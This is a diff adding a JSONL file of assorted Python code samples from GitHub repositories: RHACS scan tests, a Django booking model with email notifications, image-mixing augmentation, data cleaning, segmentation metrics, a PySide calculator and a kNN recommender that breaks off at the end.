diff --git "a/4801.jsonl" "b/4801.jsonl" new file mode 100644--- /dev/null +++ "b/4801.jsonl" @@ -0,0 +1,1941 @@ +{"seq_id":"11357770502","text":"\"\"\"Tests for Red Hat Advanced Cluster Security sources.\n\n:caseautomation: automated\n:casecomponent: cli\n:caseimportance: high\n:caselevel: integration\n:testtype: functional\n\"\"\"\nimport re\nfrom uuid import uuid4\n\nimport pytest\n\nfrom camayoc.config import settings\nfrom camayoc.qpc_models import Scan\nfrom camayoc.tests.qpc.cli.utils import scan_job\nfrom camayoc.tests.qpc.cli.utils import scan_start\nfrom camayoc.tests.qpc.cli.utils import wait_for_scan\nfrom camayoc.types.settings import SourceOptions\n\nfrom .utils import retrieve_report\nfrom .utils import scan_add_and_check\n\n\ndef rhacs_sources():\n for source_definition in settings.sources:\n if source_definition.type != \"rhacs\":\n continue\n fixture_id = source_definition.name\n yield pytest.param(source_definition, id=fixture_id)\n\n\n@pytest.mark.parametrize(\"source_definition\", rhacs_sources())\ndef test_rhacs_data(qpc_server_config, data_provider, source_definition: SourceOptions):\n \"\"\"Perform Advanced Cluster Security scan and ensure data is valid and correct.\n\n :id: 6638b3e8-5001-40dc-9acd-23d652de6ec4\n :description: Perform Advanced Cluster Security scan and check if\n details report contain expected structure, as well as data\n matches basic expectations.\n :steps:\n 1. Add source with credential for a RHACS\n 2. Perform a scan\n 3. Collect the report\n :expectedresults: Scan finishes, report can be downloaded, there are two\n basic facts (secured_units_max and secured_units_current), current Nodes\n and CPU units are not larger than max Nodes and CPU units.\n \"\"\"\n source = data_provider.sources.new_one({\"name\": source_definition.name}, data_only=False)\n scan_name = uuid4()\n scan_add_and_check(\n {\n \"name\": scan_name,\n \"sources\": source.name,\n }\n )\n data_provider.mark_for_cleanup(Scan(name=scan_name))\n # is often repeated, could be extracted / is extracted?\n # from here\n output = scan_start({\"name\": scan_name})\n match_scan_id = re.match(r'Scan \"(\\d+)\" started.', output)\n assert match_scan_id is not None\n scan_job_id = match_scan_id.group(1)\n wait_for_scan(scan_job_id, timeout=1200)\n result = scan_job({\"id\": scan_job_id})\n assert result[\"status\"] == \"completed\"\n # to here\n details, deployments = retrieve_report(scan_job_id)\n for report_source in details.get(\"sources\"):\n assert report_source.get(\"source_name\") == source.name\n for fact in report_source.get(\"facts\"):\n max_nodes = fact.get(\"secured_units_max\").get(\"maxNodes\")\n max_cpu_units = fact.get(\"secured_units_max\").get(\"maxCpuUnits\")\n current_nodes = fact.get(\"secured_units_current\").get(\"numNodes\")\n current_cpu_units = fact.get(\"secured_units_current\").get(\"numCpuUnits\")\n for max_date_key in (\"maxNodesAt\", \"maxCpuUnitsAt\"):\n assert fact.get(\"secured_units_max\").get(max_date_key) is not None\n for numeric_value in (max_nodes, max_cpu_units, current_nodes, current_cpu_units):\n assert float(numeric_value) > 0\n assert float(max_nodes) >= float(current_nodes)\n assert float(max_cpu_units) >= float(current_cpu_units)\n","repo_name":"quipucords/camayoc","sub_path":"camayoc/tests/qpc/cli/test_rhacs.py","file_name":"test_rhacs.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"35935471986","text":"from django.db import 
models\nfrom django.conf import settings\n\nfrom checkins.models import Instructor\n\nfrom datetime import datetime\n\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail, SendAt\nfrom sendgrid.helpers.mail import To\n\nimport json\n\n# Create your models here.\n\n\nclass Schedule(models.Model):\n date = models.DateField(unique=True)\n\n def __str__(self):\n return str(self.date)\n\n\nclass Time(models.Model):\n\n schedule = models.ForeignKey(Schedule, on_delete=models.CASCADE)\n start_time = models.TimeField()\n available_instructors = models.ManyToManyField(\n Instructor)\n\n class Meta:\n ordering = ['start_time']\n\n\nclass Booking(models.Model):\n\n start_time = models.ForeignKey(Time, on_delete=models.CASCADE)\n instructor = models.ForeignKey(Instructor, on_delete=models.CASCADE)\n attendee_name = models.CharField(max_length=180)\n attendee_email = models.CharField(max_length=180)\n status = models.CharField(max_length=180, default=\"unbooked\")\n\n\n@receiver(post_save, sender=Booking)\ndef send_new_attendee_notification(sender, created, instance, **kwargs):\n date_object = instance.start_time.schedule.date\n\n date = datetime.strftime(date_object, \"%a %b %d %Y\")\n\n time_object = datetime.strptime(str(instance.start_time.start_time), '%X')\n\n time = datetime.strftime(time_object, \"%H:%M%p\")\n\n instructor = Instructor.objects.get(user__name=instance.instructor)\n\n name = instance.attendee_name\n\n message = Mail(\n from_email=settings.DEFAULT_FROM_EMAIL,\n to_emails=instance.attendee_email,\n subject='Your Private Lesson Booking!',\n plain_text_content=\"Hi {},\\n\\nThank you for making a booking for a private lesson with {} on {} at {}. 
We look forward to seeing you then!\\n\\nRegards,\\n\\nEmily, Brú Grappling Studio\".format(name, instructor.user.name, date, time))\n message.reply_to = 'emily@brugrappling.ie', 'Emily Manning'\n\n instructor_message = Mail(\n from_email=settings.DEFAULT_FROM_EMAIL,\n to_emails=instructor.user.email,\n subject='New Private Lesson Booking!',\n plain_text_content=\"Hi {},\\n\\n{} {} has made a booking with you for {} at {}.\\n\\nRegards,\\n\\nEmily, Brú Grappling Studio\".format(instructor.user.name, name, instance.attendee_email, date, time))\n message.reply_to = 'emily@brugrappling.ie', 'Emily Manning'\n\n try:\n sg = SendGridAPIClient(settings.SENDGRID_API_KEY)\n response = sg.send(message)\n instructor_repsonse = sg.send(instructor_message)\n except response.error as error:\n print(error.text)\n res = json.loads(error.text)\n","repo_name":"slammer1870/bru-grappling-backend","sub_path":"privates/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4257518193","text":"import tensorflow as tf\nfrom hanser.transform.common import image_dimensions\n\n\ndef _random_int(shape, minval, maxval):\n minval = tf.cast(minval, tf.float32)\n maxval = tf.cast(maxval, tf.float32)\n xs = tf.random.uniform(shape, minval, maxval, dtype=tf.float32)\n xs = tf.cast(xs, tf.int32)\n return xs\n\n\ndef _sample(shape, scale, sample_area):\n if sample_area:\n area = tf.random.uniform(shape, scale[0], scale[1], dtype=tf.float32)\n tau = tf.sqrt(area)\n else:\n tau = tf.random.uniform(shape, scale[0], scale[1], dtype=tf.float32)\n area = tau ** 2\n return tau, area\n\n\ndef _resize_and_mix(args):\n image, image2, h_t, w_t, l, t, r, b = args\n is_batch = len(image.shape) == 4\n dtype = image.dtype\n\n image1 = tf.image.resize(image, (h_t, w_t), method='bilinear')\n if dtype == tf.uint8:\n image1 = tf.cast(image1, dtype)\n\n top = image2[..., :t, :, :]\n mid_left = image2[..., t:b, :l, :]\n mid_right = image2[..., t:b, r:, :]\n bottom = image2[..., b:, :, :]\n\n mid = tf.concat([mid_left, image1, mid_right], 2 if is_batch else 1)\n image = tf.concat([top, mid, bottom], 1 if is_batch else 0)\n return image\n\n\ndef resizemix_batch(image, label, scale=(0.1, 0.6), hard=False, sample_area=False):\n\n n, h, w, c = image_dimensions(image, 4)\n shape = (n,) if hard else ()\n tau, area = _sample(shape, scale, sample_area)\n h_t = tf.cast(tf.cast(h, tf.float32) * tau, tf.int32)\n w_t = tf.cast(tf.cast(w, tf.float32) * tau, tf.int32)\n\n h_t_1, h_t_2 = h_t // 2, h_t - h_t // 2\n w_t_1, w_t_2 = w_t // 2, w_t - w_t // 2\n cx = _random_int(shape, w_t_1, w - w_t_2)\n cy = _random_int(shape, h_t_1, h - h_t_2)\n l, t, r, b = cx - w_t_1, cy - h_t_1, cx + w_t_2, cy + h_t_2\n\n indices = tf.random.shuffle(tf.range(n))\n image2 = tf.gather(image, indices)\n label2 = tf.gather(label, indices)\n\n if hard:\n image = tf.map_fn(\n _resize_and_mix, (image, image2, h_t, w_t, l, t, r, b), fn_output_signature=image.dtype)\n else:\n image = _resize_and_mix((image, image2, h_t, w_t, l, t, r, b))\n\n image.set_shape((n, h, w, c))\n\n lam = area[:, None] if hard else area\n label = label * lam + label2 * (1. 
- lam)\n return image, label","repo_name":"sbl1996/hanser","sub_path":"hanser/transform/mix/resizemix.py","file_name":"resizemix.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"72175394403","text":"from __future__ import division\nimport os\nos.chdir(r'D:\\Haverford\\2017-2018\\Chem 362')\n\nimport pickle, time\nimport numpy as np\nimport pandas as pd\nfrom sklearn.utils import shuffle\n\n\"\"\"PARAMS\"\"\"\nkset = [1, 2, 3, 5]\n\n\"\"\"DEFS\"\"\"\ndef Zscore_slow(df, averagetype='median', deviationtype='std'):\n # More options\n # avgtype: which number to subtract the sample with - median or mean\n # stdtype: median absolute deviation or standard deviation\n emptydf = df.copy()\n cols = list(df.columns)\n\n def average(series):\n if averagetype == 'median':\n return series.median()\n if averagetype == 'mean':\n return series.mean()\n \n def deviation(series):\n if deviationtype == 'mad':\n medianlist = abs(series - series.median())\n return medianlist.median()\n if deviationtype == 'std':\n return series.std(ddof=0)\n\n for col in cols:\n emptydf[col] = (df[col] - average(df[col]))/deviation(df[col])\n \n return emptydf\n\ndef Zscore(df):\n # Default method of the more comprehensive function defined above\n emptydf = df.copy()\n cols = list(df.columns)\n\n for col in cols:\n emptydf[col] = (df[col] - df[col].median())/df[col].std(ddof=0)\n \n return emptydf\n\n# Splits arrays by conditions\ndef BoolSplit(arr, cond):\n \n mask = np.zeros(len(arr), dtype=bool)\n mask[cond] = True\n \n return arr[mask], arr[~mask]\n\n\"\"\"MAIN TEXT\"\"\"\n# Replace with pandas_dataframe_from_csv\ndf = pd.read_csv('nature17439-s2.csv')\n\n# Remove all columns marked with XXX\n# Preserve their info\n# data = df[[col for col in df.columns if 'XXX' not in col]]\nreality = df.iloc[:,293].copy()\nrawdata = df[[col for col in df.columns if 'XXX' in col ]].copy()\nreagents = rawdata.iloc[:, [1, 4, 7, 10, 13, 16]]\ndata = df.iloc[:,:293].drop(rawdata.columns, axis=1)\n\n# Issue 1\n# Still contains strings\n# Convert data such as 'yes' and 'no' to 1s and 0s.\ndata = data.replace('yes', 1.0)\ndata = data.replace('no', 0.0)\ndata.fillna(value=-1.0, inplace=True)\n\n# Issue 2\n# Leave no rows with null values or strings\ncols = data.columns[data.dtypes.eq('object')]\ndata[cols] = data[cols].apply(pd.to_numeric, downcast='float', errors='coerce')\nnullrows = data.index[data.isnull().any(1)]\n\ndata = data.dropna(axis=0, how='any')\nreagents = reagents.drop(nullrows)\nreality = reality.drop(nullrows)\nrawdata = rawdata.drop(nullrows)\n\n# Issue 3\n# Permute the rows randomly\nreality, rawdata, reagents = shuffle(reality, rawdata, reagents)\n\n# Issue 4\n# Many cols have the same entries, hence redundant to our analysis\n# cols = list(df)\nnunique = data.apply(pd.Series.nunique)\ncols_to_drop = nunique[nunique == 1].index\n\ndatacopy = data.drop(cols_to_drop, axis=1)\n\nprint('Filtering completed')\n# Issue 5\n# Different columns have different scales\n# Calculate Z-score of each\n# Some columns might serve as better indicators than their Z-scores, e.g. pH\n# Pitfalls of Z-scores: distribs. other than Gaussian, e.g. 
double Gaussian\nZscore_calc_start = time.clock()\n\ndata = Zscore(datacopy)\n\nZscore_calc_end = time.clock()\nprint('Z-score substitution completed')\nprint('Calculating the Z-score took', Zscore_calc_end - Zscore_calc_start)\n\ndef ExploratorySplit(D, R, r, testsize, exacttestsize=True):\n # D for data\n # R for reagents (so named because it has 6 columns)\n # r for reality (so named because it is 1D)\n # testsize for the desired size of testing set\n \n # exacttestsize - When the expected testing set size has been achieved, we \n # must take away all similar reactions with it. When set to False, we set\n # all the rows taken away to be the testing set. If not, we trim down these\n # rows until its size is exactly testsize.\n\n X_test = pd.DataFrame()\n Y_test = pd.DataFrame()\n \n i = 0\n while i < testsize:\n j = 0\n \n testrow = np.random.choice(R.index.values)\n testrgt = set(R.loc[testrow])\n testrgt.discard('-1')\n \n X_test = X_test.append(D.loc[[testrow]])\n Y_test = Y_test.append([r[testrow]])\n \n R = R.drop(testrow)\n j += 1\n \n for row in R.itertuples(index=True):\n idx = row[0]\n reagent = set(row[1:])\n reagent.discard('-1')\n \n # See https://stackoverflow.com/questions/16096627/selecting-a-row-of-pandas-series-Dframe-by-integer-index for difference between loc & iloc\n if reagent.issubset(testrgt):\n X_test = X_test.append(D.loc[[idx]])\n Y_test = Y_test.append([r[idx]])\n R = R.drop(idx)\n j += 1\n # print(D.loc[idx])\n # print(r[idx])\n \n i += j\n \n # Move all those are left to the training set\n trainrows = R.index.values.tolist()\n X_train = D.loc[trainrows]\n Y_train = r[trainrows]\n\n # Trim the rest so that the number of testing rows is testsize\n if exacttestsize == True:\n X_test = X_test.iloc[np.random.choice(i, size=testsize)]\n Y_test = Y_test.iloc[np.random.choice(i, size=testsize)]\n print('The size of the testing set is', testsize)\n else:\n print('The size of the testing set is', i)\n \n print('The size of the training set is', len(D) - i)\n \n X_test_np = np.array(X_test)\n Y_test_np = np.array(Y_test)\n X_train_np = np.array(X_train)\n Y_train_np = np.array(Y_train)\n \n return X_test_np, Y_test_np, X_train_np, Y_train_np\n\nlabel_dist = [reality.value_counts()[i]/reality.count() for i in range(1, 5)]\n\npackage0 = ExploratorySplit(data, reagents, reality, 300, exacttestsize=False)\n\npackage = package0, label_dist\n\nprint('Train/Test split completed')\n\nwith open('cleandata.p', 'wb') as g:\n g.seek(0)\n g.truncate() # Erase everything before moving forward\n pickle.dump(package, g)\n\n\"\"\"\ndomain = set(range(1,3000))\ndims = range(293)\nZscore_exempted_cols = set()\nuselesscols = {293}\n\nrowdict = {i: i for i in domain}\ncoldict = {i: i for i in dims}\n\nrawdata = []\nreality = []\n\n# Check if the number of rows and columns are uniform??\nrowlen = set()\ncollen = set()\n\nwith open('nature17439-s2.csv', 'r') as f:\n reader = csv.reader(f)\n header = next(reader)\n numcol = len(header)\n for title in header:\n if 'XXX' in title:\n uselesscols.add(header.index(title))\n usefulcols = set(range(numcol)).difference(uselesscols)\n colsleft = len(usefulcols)\n allrows = [row for idx, row in enumerate(reader) if idx in domain]\n for row in allrows:\n usefulrow = [row[i] for i in usefulcols]\n actual_outcome = row[293]\n rawdata.append(usefulrow)\n reality.append(actual_outcome)\n\n\n# Issue 1\n# Leave no rows with null values\nfor i, row in enumerate(rawdata):\n if any(('?' 
in j) for j in row):\n for rowd in rowdict:\n if rowd > i:\n rowdict[rowd] -= 1\n del rawdata[i]\n del reality[i]\n \n# Issue 2\n# Still contains strings\n# Convert data such as 'yes' and 'no' to 1s and 0s.\n# Assign numbers to different reagents\n# Convert invalid entries (-1) to something else?\nrawdata0 = [[] for _ in rawdata]\n\nfor i, row in enumerate(rawdata):\n stringrows = set()\n j = 0\n while j <= colsleft - 1:\n if row[j] == None:\n rawdata0[i].append(-1.0)\n elif row[j] == 'yes':\n rawdata0[i].append(1.0)\n Zscore_exempted_cols.add(j)\n # record column number, add to exempted columns for Z-score replacement\n elif row[j] == 'no':\n rawdata0[i].append(0.0)\n Zscore_exempted_cols.add(j)\n else:\n try:\n floatij = float(row[j])\n rawdata0[i].append(floatij)\n except:\n print('String in row', i, 'and column', j)\n print(row[j])\n stringrows.add(i)\n j += 1\n\nfor k in stringrows:\n for rowd in rowdict:\n if rowd > k:\n rowdict[rowd] -= 1\n del rawdata0[k]\n k -= 1\n\n# Issue 3\n# Many cols have the same entries, hence redundant to our analysis\nrawdatatrsp = list(map(list, zip(*rawdata0)))\nfor i in rawdatatrsp:\n if all(j == i[0] for j in i):\n for col in coldict:\n if col > rawdatatrsp.index(i):\n coldict[col] -= 1\n rawdatatrsp.remove(i)\n\nZscore_exempted_cols = {coldict[col] for col in Zscore_exempted_cols}\n\n# print(rawdatatrsp)\n# Produces strings, especially yes and noes\n\nprint(Zscore_exempted_cols)\nprint(uselesscols)\n\nZscore_calc_start = time.clock()\n\n# Issue 4\n# Different columns have different scales\n# Calculate Z-score of each\n# Some columns might serve as better indicators than their Z-scores, e.g. pH\n# Pitfalls of Z-scores: distribs. other than Gaussian, e.g. double Gaussian\ndef Zscore(i, j):\n return (j - np.median(i))/np.std(i)\n\n# HUGE PROBLEM - after each replacement the median is calculated with the new value\n# yol bar\n# SOLUTION - Use the rawdata entity again\nrawdata = [[] for _ in rawdata0]\n\nfor i in rawdatatrsp:\n if rawdatatrsp.index(i) not in Zscore_exempted_cols:\n for j, item in enumerate(i):\n try:\n t = Zscore(i, item)\n rawdata[j].append(t)\n except:\n print(item, type(item), rawdatatrsp.index(i), j)\n pass\n\nprint(rawdata)\n\nZscore_calc_end = time.clock()\nprint('Calculating the Z-score took', Zscore_calc_end - Zscore_calc_start)\n\npackage = rawdata, reality, Zscore_exempted_cols, coldict, rowdict\n\nwith open('cleandata.p', 'wb') as g:\n g.seek(0)\n g.truncate() # Erase everything before moving forward\n pickle.dump(package,g)\n\"\"\"\n\n\"\"\"\nCrystal size was coded with the labels 1 for no solid product, 2 for an\namorphous solid, 3 for a polycrystalline sample or 4 for single crystals with\naverage crystallite dimensions exceeding approximately 0.01 mm. (This size\ncorresponds to the general requirements for standard single-crystal X-ray diffraction\ndata collection.) 
Product purity was coded with the labels 1 for a multiphase\nproduct or 2 for a single-phase product.\"\"\"","repo_name":"z-q-y/darkrxns","sub_path":"proj_dataclean.py","file_name":"proj_dataclean.py","file_ext":"py","file_size_in_byte":10118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43524421977","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom __future__ import print_function\n\nimport argparse\nimport codecs\nimport json\nimport numpy as np\nimport segeval\nfrom sklearn.metrics import make_scorer as sk_make_scorer\nimport sys\n\n\ndef boundary_indices_to_labels(gap_count, boundary_indices):\n \"\"\"\n Parameter\n ---------\n gap_count : int\n boundary_indices : [int]\n\n Returns\n -------\n boundary_labels : [int]\n\n >>> boundary_indices_to_labels(5, [1, 3])\n [0, 1, 0, 1, 0]\n >>> boundary_indices_to_labels(5, [])\n [0, 0, 0, 0, 0]\n >>> boundary_indices_to_labels(5, [4])\n [0, 0, 0, 0, 1]\n \"\"\"\n labels = [0 for i in xrange(gap_count)]\n for i in boundary_indices:\n labels[i] = 1\n return labels\n\n\ndef boundary_indices_to_masses(gap_count, boundary_indices):\n \"\"\"\n >>> boundary_indices_to_masses(12, [3, 10])\n [4, 7, 2]\n >>> boundary_indices_to_masses(12, [])\n [13]\n >>> boundary_indices_to_masses(12, [11])\n [12, 1]\n \"\"\"\n masses = []\n previous = -1\n for i in boundary_indices:\n masses.append(i - previous)\n previous = i\n masses.append(gap_count - previous)\n return masses\n\n\ndef boundary_labels_to_masses(labels, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n labels : [int or str]\n label[i] = 1 when gap[i] is a boundary, = 0 otherwise\n boundary_label : int or str\n\n Returns\n -------\n masses : [int]\n\n >>> boundary_labels_to_masses([0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0])\n [4, 7, 2]\n >>> boundary_labels_to_masses([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n [13]\n >>> boundary_labels_to_masses([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1])\n [12, 1]\n \"\"\"\n labels_ = labels.tolist() if isinstance(labels, np.ndarray) else labels\n masses = []\n count = 0\n for label in labels_:\n count += 1\n if label == boundary_label:\n masses.append(count)\n count = 0\n masses.append(count + 1)\n return masses\n\n\ndef window_diff(ref, pred, punish_zero_seg=False, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n ref : [int or str]\n ref boundary labels\n pred : [int or str]\n pred boundary labels\n punish_zero_seg : bool\n if True zero-segmentation will get 1.0\n boundary_label : int or str\n\n >>> window_diff([-1, -1, 1, -1, -1], [-1, -1, -1, 1, -1])\n 0.5\n >>> window_diff([-1, -1, 1, -1, -1], [-1, -1, -1, -1, -1])\n 0.5\n >>> window_diff([-1, -1, 1, -1, -1], [-1, -1, -1, -1, -1], punish_zero_seg=True)\n 1.0\n \"\"\"\n masses_ref = boundary_labels_to_masses(ref, boundary_label=boundary_label)\n masses_pred = boundary_labels_to_masses(pred, boundary_label=boundary_label)\n if punish_zero_seg and len(masses_pred) == 1:\n return 1.0\n return float(segeval.window_diff(masses_pred, masses_ref))\n\n\ndef average_window_diff(refs, preds, punish_zero_seg=False, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n refs : [[int]]\n refs[i][j] is reference label of j-th gap in i-th doc\n preds : [[int]]\n preds[i][j] is predicted label of j-th gap in i-th doc\n punish_zero_seg : bool\n if True zero-segmentation will get 1.0\n\n Returns\n -------\n wds : [float]\n window_diffs for all docs\n average : float\n \"\"\"\n window_diffs = []\n for ref, pred in zip(refs, preds):\n window_diffs.append(window_diff(\n 
ref, pred, punish_zero_seg, boundary_label=boundary_label))\n average = sum(window_diffs) / len(window_diffs)\n return window_diffs, average\n\n\ndef pk(ref, pred, punish_zero_seg=False, boundary_label=1):\n masses_ref = boundary_labels_to_masses(ref, boundary_label=boundary_label)\n masses_pred = boundary_labels_to_masses(pred, boundary_label=boundary_label)\n if punish_zero_seg and len(masses_pred) == 1:\n return 1.0\n return float(segeval.pk(masses_pred, masses_ref))\n\n\ndef average_pk(refs, preds, punish_zero_seg=False, boundary_label=1):\n \"\"\"\n Parameter\n ---------\n refs : [[int]]\n refs[i][j] is reference label of j-th gap in i-th doc\n preds : [[int]]\n preds[i][j] is predicted label of j-th gap in i-th doc\n\n Returns\n -------\n pks : [float]\n pks for all docs\n average : float\n \"\"\"\n pks = []\n for ref, pred in zip(refs, preds):\n pks.append(pk(ref, pred, punish_zero_seg, boundary_label=boundary_label))\n average = sum(pks) / len(pks)\n return pks, average\n\n\ndef _window_diff_func(y_ref, y_pred, punish_zero_seg=False, boundary_label=1):\n _, average_wd = average_window_diff(\n y_ref, y_pred, punish_zero_seg=punish_zero_seg, boundary_label=boundary_label)\n return average_wd\n\n\ndef window_diff_scorer(punish_zero_seg=False, boundary_label=1):\n scorer = sk_make_scorer(_window_diff_func, greater_is_better=False,\n punish_zero_seg=punish_zero_seg,\n boundary_label=boundary_label)\n return scorer\n\n\ndef read_segment(segment_file):\n segment_dict = {}\n for line in segment_file:\n segment_json = json.loads(line)\n labels = boundary_indices_to_labels(\n segment_json['gapCount'], segment_json['boundaryIndices'])\n segment_dict[segment_json['id']] = labels\n return segment_dict\n\n\ndef main(opt):\n with codecs.open(opt.ref_jsonl, encoding='utf-8') as ref_file:\n ref_dict = read_segment(ref_file)\n for pred_jsonl in opt.pred_jsonl:\n with codecs.open(pred_jsonl, encoding='utf-8') as pred_file:\n pred_dict = read_segment(pred_file)\n pk_list = []\n wd_list = []\n print('==> {} <=='.format(pred_jsonl))\n for doc_name, pred_a_doc in pred_dict.iteritems():\n if doc_name not in ref_dict:\n continue\n ref_a_doc = ref_dict[doc_name]\n pk_ = pk(ref_a_doc, pred_a_doc)\n wd = window_diff(ref_a_doc, pred_a_doc)\n print('name:{} Pk:{:.3f} WD:{:.3f}'.format(doc_name, pk_, wd))\n pk_list.append(pk_)\n wd_list.append(wd)\n print('Pk(average):{:.3f} WD(average):{:.3f}'.format(\n sum(pk_list) / len(pk_list), sum(wd_list) / len(wd_list)))\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('ref_jsonl')\n arg_parser.add_argument('pred_jsonl', nargs='+')\n opt = arg_parser.parse_args()\n main(opt)\n","repo_name":"binghaobhw/topic-segmentation","sub_path":"topic-segmentation/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17061353234","text":"from PySide6.QtWidgets import (\n QApplication, QWidget, QGridLayout, QLCDNumber, QPushButton)\nfrom functools import partial\nfrom helpers import *\n\n\nclass Window(QWidget):\n def __init__(self):\n super().__init__()\n self.setFixedWidth(480)\n self.setFixedHeight(360)\n self.setWindowTitle(\"Calculadora\")\n with open(absPath(\"Scalcula.qss\")) as styles:\n self.setStyleSheet(styles.read())\n\n self.setLayout(QGridLayout())\n self.calculadora = QLCDNumber()\n self.layout().addWidget(self.calculadora, 0, 0)\n\n\nif __name__ == '__main__':\n app 
= QApplication()\n window = Window()\n window.show()\n app.exec_()\n","repo_name":"hektorprofe/curso-qt-pyside-udemy","sub_path":"Proyectos/Proyecto 05/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"12895396090","text":"import numpy as np\nimport pandas as pd\nfrom scipy.spatial.distance import cosine, correlation\n\n#--------------------------------------------------------------------------------------------------\n\ndef pearsonSim(inA,inB):\n\t### This function converts the Pearson correlation between two vectors\n\t### into a similarity function returning value in range [0,1]\n from scipy.spatial.distance import correlation\n if len(inA) < 3 : return 1.0\n\t# Note that scipy function is a distance function, 1-correlation will give the standard Pearson similarity\n return 0.5+0.5*(1-correlation(inA, inB)) \n\t\ndef cosineSim(inA,inB):\n\t### Coverts the scipy Cosine distance into a similarity function\n from scipy.spatial.distance import cosine\n return (1 - cosine(inA,inB))\n\n#--------------------------------------------------------------------------------------------------\n\ndef knn_search(x, D, metric=pearsonSim):\n sims = np.array([])\n num_instances = np.shape(D)[0]\n for i in range(num_instances):\n d = D[i,:]\n overlap = np.nonzero(np.logical_and(x>0, d>0))[0] # find indices of the overlapping (co-rated) items\n if len(overlap) == 0:\n sim = 0\n else: \n sim = metric(x[overlap], d[overlap]) # we only want to compute similarities on overlapping items\n\n if not np.isnan(sim): # depending on the number of overlapping items, correlation maybe undefined\n sims = np.append(sims, [sim])\n else:\n sims = np.append(sims, 0)\n\n idx = np.argsort(sims) # find indices of most similar neighbors to x\n idx = idx[::-1] # order in terms of decreasing similarity\n # return the indexes of neighbors in decreasing order of similarity and array of all similarities\n return idx, sims\n\n#--------------------------------------------------------------------------------------------------\n\ndef knn_predict(user, item, RatingsMat, K, metric=pearsonSim):\n \n \"\"\" Given user (a Numpy array with same dimensions as RatingsMat columns \"\"\"\n \"\"\" item (a column index in RatingsMat) and RatingsMat, the ratings matrix \"\"\"\n \"\"\" (a 2d Numpy array), find the K nearest neighbors of user and use weighted \"\"\"\n \"\"\" average of their ratings on item as predicted rating for (user, item). 
\"\"\"\n \n neigh_idx, sims = knn_search(user, RatingsMat, metric)\n \n # Ratings of the neighbors on item\n neigh_ratings = RatingsMat[neigh_idx][:,item]\n neigh_sims = sims[neigh_idx]\n wr = 0\n sum_sim = 0\n # compute the weighted average rating of the neighbors on item\n for i in range(K):\n if (neigh_ratings[i] > 0) & (neigh_sims[i] > 0):\n wr += neigh_ratings[i] * neigh_sims[i]\n sum_sim += neigh_sims[i]\n if sum_sim > 0:\n predicted_rating = wr/sum_sim\n else:\n item_vec = RatingsMat[:,item] # if there are no neighbors with ratings for item,then use \n # the item's average rating across all users as the prediction\n predicted_rating = (RatingsMat[:,item][item_vec > 0]).mean()\n return predicted_rating\n\n#--------------------------------------------------------------------------------------------------\n\ndef cross_validate_user(dataMat, user, test_ratio, K, metric=pearsonSim):\n \n \"\"\" For a given test user, this function randomly selects test_ratio percent of the \"\"\"\n \"\"\" already rated items and computes the prediction errors for these test items \"\"\"\n \n number_of_items = np.shape(dataMat)[1]\n rated_items_by_user = np.array([i for i in range(number_of_items) if dataMat[user,i]>0])\n test_size = int(test_ratio * len(rated_items_by_user))\n test_indices = np.random.randint(0, len(rated_items_by_user), test_size)\n withheld_items = rated_items_by_user[test_indices]\n original_user_profile = np.copy(dataMat[user]) # maintain the original ratings to be restored later\n dataMat[user, withheld_items] = 0 # So that the withheld test items is not used in the rating prediction below\n error_u = 0.0\n count_u = len(withheld_items)\n\n # Compute absolute error for user u over all test items\n for item in withheld_items:\n # Estimate rating on the withheld item\n u = dataMat[user]\n # print(\"user: \", u, \"Item: \", i)\n predicted_rating = knn_predict(u, item, dataMat, K, metric)\n error_u = error_u + abs(predicted_rating - original_user_profile[item])\n \n # Now restore ratings of the withheld items to the user profile\n for item in withheld_items:\n dataMat[user, item] = original_user_profile[item]\n \n # Return sum of absolute errors and the count of test cases for this user\n # Note that these will have to be accumulated for each user to compute MAE\n return error_u, count_u\n\n#--------------------------------------------------------------------------------------------------\n\ndef test(dataMat, num_test_users, test_ratio, K, metric=pearsonSim):\n \n \"\"\" This function performs cross_validate_user on the first num_test_users in the training data \"\"\"\n \"\"\" It returns the Mean Absolute Error (MAE) across all test cases. 
\"\"\"\n\t\n total_error=0.0;\n total_test_cases=0.0\n for u in range(num_test_users):\n error_u, count = cross_validate_user(dataMat, u , test_ratio, K, metric)\n # print('Evaluating user', u, ' out of', num_test_users, 'MAE: ', error_u/count)\n total_error=total_error+error_u\n total_test_cases=total_test_cases+count\n print('Mean Absoloute Error for K =',K,' : ', total_error/total_test_cases)\n return(total_error/total_test_cases)\n\n#--------------------------------------------------------------------------------------------------\n\ndef recommend(user, Ratings, K, N=3, metric=pearsonSim):\n\n \n u = np.array(Ratings.iloc[user])\n RatingsMat = np.array(Ratings)\n predictions = np.zeros(len(u))\n unrated = 0\n \n for j in range(len(u)):\n if u[j] == 0:\n unrated += 1\n j_pred = knn_predict(u, j, RatingsMat, K, metric)\n # print(j, j_pred)\n predictions[j] = j_pred\n \n recs = np.argsort(predictions)\n recs = recs[::-1]\n if unrated < N: N = unrated\n preds = predictions[recs[:N]]\n items = Ratings.columns[recs[:N]]\n\n return preds, 